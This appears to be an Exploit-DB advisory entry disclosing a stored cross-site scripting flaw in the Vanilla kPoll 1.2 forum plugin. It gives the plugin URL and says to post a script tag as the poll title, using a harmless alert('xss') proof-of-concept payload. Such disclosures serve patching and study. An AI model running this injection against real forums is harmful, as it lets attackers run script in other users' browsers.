[] NeoSense

vanilla kpoll plugin 1.2 - Persistent Cross-Site Scripting

Author: Henry Hoggard
type: webapps
platform: php
port: 
date_added: 2012-06-06 
date_updated: 2012-06-07 
verified: 1 
codes: OSVDB-82633 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comkpoll-plugin-1-2.zip

# Title: Vanilla kPoll 1.2 Stored XSS
# Date: 5/6/12
# Author: Henry Hoggard
# Author URL: henryhoggard.co.uk
# Author Twitter: @henryhoggard
# Software: Vanilla Version 2.0.18.4 + Vanilla kPoll 1.2
# http://vanillaforums.org/download
# http://vanillaforums.org/addon/kpoll-plugin

To Create the XSS go to this link,

http://vanilla.tld/index.php?p=/plugin/kPoll

Post your XSS as the poll title.

The XSS I used is
<script>alert('xss')</script>

#############################################################